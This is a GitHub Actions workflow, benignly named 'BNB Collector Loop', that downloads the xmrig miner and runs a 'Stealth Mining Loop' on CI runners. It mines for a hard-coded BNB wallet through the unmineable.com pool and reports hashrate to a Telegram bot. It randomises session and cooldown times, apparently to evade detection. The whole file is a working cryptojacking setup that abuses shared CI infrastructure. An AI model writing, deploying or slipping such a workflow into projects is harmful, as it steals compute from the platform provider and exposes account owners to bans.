name: BNB Collector Loop

on:
  schedule:
    - cron: '0 6,18 * * *'  # Jam 13:00 & 01:00 WIB
  workflow_dispatch:

permissions:
  contents: read

jobs:
  bnb:
    runs-on: ubuntu-latest
    timeout-minutes: 360  # Max 6 jam

    steps:
      - name: Update & Install Tools
        run: |
          sudo apt update -y && sudo apt install -y curl tar

      - name: Download Miner
        run: |
          curl -L -o xmrig.tar.gz https://github.com/xmrig/xmrig/releases/download/v6.24.0/xmrig-6.24.0-linux-static-x64.tar.gz
          tar -xzf xmrig.tar.gz
          cd xmrig-6.24.0
          chmod +x xmrig
          mv xmrig ../miner
          cd ..
          mkdir -p logs

      - name: Run Stealth Mining Loop
        env:
          TG_TOKEN: ${{ secrets.TG_TOKEN }}
          TG_CHAT_ID: ${{ secrets.TG_CHAT_ID }}
        run: |
          echo "🟢 *BNB Collector aktif.*" | xargs -0 curl -s -X POST https://api.telegram.org/bot$TG_TOKEN/sendMessage -d chat_id=$TG_CHAT_ID --data-urlencode text@- -d parse_mode=Markdown

          START=$(date +%s)
          MAX_DURATION=$((6 * 60 * 60))  # 6 jam

          while true; do
            NOW=$(date +%s)
            ELAPSED=$((NOW - START))
            [ "$ELAPSED" -ge "$MAX_DURATION" ] && break

            echo "⏳ Sesi baru dimulai..."
            SESSION=$((RANDOM % 1800 + 900))  # 15–45 menit
            COOLDOWN=$((RANDOM % 900 + 300))  # 5–15 menit

            ./miner -a rx -o stratum+ssl://rx.unmineable.com:443 \
              -u BNB:0xf319aef8c1d323c83740bcde9f25238ff5c4855d.unmineable_worker_vidjbpg#f2xg-6ynu \
              -p x --randomx-no-rdmsr | tee logs/session.log &
            PID=$!

            sleep $SESSION
            kill $PID
            sleep 5

            HASHRATE=$(grep -a "speed" logs/session.log | tail -n1 | sed 's/\x1b\[[0-9;]*m//g' | awk '{print $(NF-1)" H/s"}')
            ACCEPTED=$(grep -a "accepted" logs/session.log | wc -l)
            REJECTED=$(grep -a "rejected" logs/session.log | wc -l)

            MSG="✅ *BNB Collector selesai (1 sesi).*%0A%0A📊 *Stats:*%0A• Hashrate: \`$HASHRATE\`%0A• Accepted: \`$ACCEPTED\`%0A• Rejected: \`$REJECTED\`"
            curl -s -X POST https://api.telegram.org/bot$TG_TOKEN/sendMessage \
              -d chat_id=$TG_CHAT_ID -d text="$MSG" -d parse_mode=Markdown

            echo "😴 Cooldown selama $COOLDOWN detik..."
            sleep $COOLDOWN
          done
